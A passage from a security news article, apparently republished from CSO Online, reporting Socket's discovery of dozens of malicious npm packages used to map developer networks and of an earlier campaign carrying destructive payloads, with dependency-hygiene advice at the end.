The accounts are now defunct: The first three malicious packages, “e-learning-garena,” “seatalk-rn-leave-calendar,” and “coral-web-be,” were released under the npm accounts bbbb335656, cdsfdfafd1232436437, and sdsds656565, respectively. Since then, all three accounts have gone on to publish twenty malicious packages each.According to Socket, the first package emerged eleven days ago, and the most recent appeared only hours before the disclosure publication, confirming the operation was still underway at the time.However, an npm search at the time of writing this article revealed that the accounts may have been taken off npm. None of the packages flagged in the Socket research could be traced with the search either.While they were live on npm, the combined downloads were reported to have exceeded 3000, which Socket said would have given threat actors a “growing map of developer and enterprise networks” for future intrusions. Multiple npm abuses discovered within days: npm, the go-to package for JavaScript, has turned into an attacker’s favorite for its unmatched reach into developer workflows and the ability to become a strong vector for large-scale supply chain attacks.Earlier this week, Socket also discovered a collection of malicious npm packages, undetected within npm for over two years, that deploy attacks against widely-used JavaScript frameworks including React, Vue.js, Vite, Node.js, and the open-source Quill Editor.Masquerading as harmless plugins and utilities, the malicious packages carried destructive payloads meant to corrupt data, wipe critical files, and crash systems. Since their upload, they’ve picked up over 6200 downloads, escaping detection and slipping into unsuspecting developer environments.”The threat actor behind this campaign, using the npm alias xuxingfeng with a registration email 1634389031@qq[.]com, has published eight packages designed to cause widespread damage across the JavaScript ecosystem,” said Socket researcher Kush Pandya in a blog post. “Notably, the same account has also published several legitimate, non-malicious packages that function as advertised.”Earlier this month, hackers were found abusing npm to target multi-language developers with typo-squatted packages containing stealer and RCE codes. Boychenko advised applying standard hygiene while managing dependencies from npm. He recommended using dependency-scanning tools to flag post-install hooks, hardcoded URLs, and unusually small tar archives, in addition to strengthening the development pipeline with automated security checks.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/3995813/hackers-drop-60-npm-bombs-in-less-than-two-weeks-to-recon-dev-machines.html
